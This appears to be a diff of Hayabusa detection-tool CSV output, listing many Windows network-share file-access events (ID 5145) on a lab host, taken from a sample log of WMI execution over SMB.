+2021-04-22 20:32:29.683 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Build\d6c8ca8dfe9cd143210459e72a546bf8  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.683 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.C8d726d22#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.683 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.C8d726d22#\95eb335a0d6884a4b311ce7041f71bc3  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.699 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.C25dcfcb8#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.699 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.C25dcfcb8#\81fd3145ed18f31e338ec4dcb5afd7f7  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.699 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.C26a36d2b#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.699 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.C26a36d2b#\2dab9f12dfcdb3bd487693c1bb12e0a6  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.714 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Ca018eff0#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.714 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Ca018eff0#\4d5abc40df9ad72124f147d1d55dd690  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.714 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.CSharp  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.730 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.CSharp\004d51a9ac1d91d6537ad572591ebbd3  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.730 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.D0ff51f83#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.730 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.D0ff51f83#\b7a83293c2e4f23480fc3660b70099e6  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.730 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.G46fcc235#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.730 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.G46fcc235#\f8fa567f21f9aef0ae471c625b59c159  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.730 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.G91a07420#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.730 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.G91a07420#\5d1b6f60febb9cec91a92675a96ee63d  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.746 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Ga41585c2#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.746 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Ga41585c2#\b101a91893057573f159893cb9c2f28d  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.746 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.I0cd65b90#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.746 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.I0cd65b90#\e037edd0e9a4a487424cd2d4e3527c92  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.764 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.I7676db1a#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.764 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.I7676db1a#\aaf7a4161dcd6792ce570a810a0c53f6  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.764 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Ib6702479#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.764 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Ib6702479#\662c453241af44299325f4c07d7f718c  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.764 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Ic1a2041b#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.764 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Ic1a2041b#\154acb6c70e2dddd2c94bf0bc748b8b7  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.780 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Ifcaec084#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.780 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Ifcaec084#\9d9142f584dbdd4e6d4bd7fd6f877b66  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.780 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Kd58820a5#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.780 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Kd58820a5#\ba928c3b8a0cdac392162a6b572de29f  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.780 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.M870d558a#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.780 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.M870d558a#\1b67145a56e345e0d2e731357f498c1d  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.780 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Meefd589e#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.780 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Meefd589e#\e857b644c45626101624d874e1860701  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.780 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Mf5ac9168#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.780 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Mf5ac9168#\1b9aff98baffeed692a8e8768c0c4e47  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.796 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Mf49f6405#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.796 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Mf49f6405#\2f732bd1dcfeef1bb935c1d1444abdef  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.796 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Mff1be75b#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.796 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Mff1be75b#\4844f53bd0e47d8f8a5795e6484a0f88  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.796 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P0e11b656#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.796 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P0e11b656#\a169d08938fb7766d16496db1e648137  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.811 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P6f9a5e83#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.811 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P6f9a5e83#\75b419c806fb708ac368c6282c922a84  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.827 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P6f792626#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.827 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P6f792626#\dd3aaf75f45749961d52d194dab801a2  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.827 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P08ac43d5#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.827 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P08ac43d5#\e18185ddd154ffdd54cb6c9f0ee8bd44  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.827 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P9de5a786#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.827 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P9de5a786#\c3205ecae7e5cd14582725a8b5e0d26b  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.843 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P10d01611#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.843 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P10d01611#\a29f0b2b0504e328a9aa939a93159e40  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.843 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P34f388c1#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.843 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P34f388c1#\46b29d8a49f03df40a948c722e1b8971  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.843 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P1706cafe#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
